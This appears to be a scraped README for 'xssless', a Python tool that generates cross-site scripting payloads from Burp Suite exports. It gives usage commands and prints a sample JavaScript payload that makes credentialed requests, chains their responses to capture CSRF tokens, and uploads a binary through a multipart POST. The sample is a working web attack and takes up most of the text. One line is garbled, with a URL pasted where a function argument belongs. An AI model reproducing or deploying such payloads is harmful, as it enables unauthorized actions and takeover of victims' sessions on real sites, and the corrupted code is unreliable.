
An automated XSS payload generator written in python.
An automated XSS payload generator written in python.
./xssless.py burp_export_fileA more detailed tutorial can be found here
Download the latest xssless:
git clone https://github.com/mandatoryprogrammer/xssless
Run the script:
./xssless.py -h
This is an example XSS payload output (uncompressed) that parses CSRF tokens and uploads a binary all via XSS!
Example command line usage:
./xssless.py -s -f=example_file_list.txt -p=example_csrf_token_list.txt file_upload
<script type="text/javascript">
m();
function m() {
var funcNum = 0;
doRequest = function(url, method, body)
{
var http = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
http.withCredentials = true;
http.onreadystatechange = function() {
if (this.readyState == 4) {
var response = http.responseText;
var d = document.implementation.createHTMLDocument("");
d.documentElement.innerHTML = response;
requestDoc = d;
funcNum++;
try {
window['r' + funcNum](https://github.com/mandatoryprogrammer/xssless/blob/master/requestDoc);
} catch (error) {}
}
};
if (method == "MPOST") {
http.open('POST', url, true);
var bound = Math.random().toString(36).slice(2);
body = body.split("BOUNDMARKER").join(bound);
http.setRequestHeader('Content-type', 'multipart/form-data, boundary=' + bound);
http.setRequestHeader('Content-length', body.length);
http.setRequestHeader('Connection', 'close');
http.sendAsBinary(body);
}
if (method == "GET") {
http.open('GET', url, true);
http.send();
}
}
r0();
}
function r0(requestDoc){
doRequest('/uploader/', 'GET', '');
}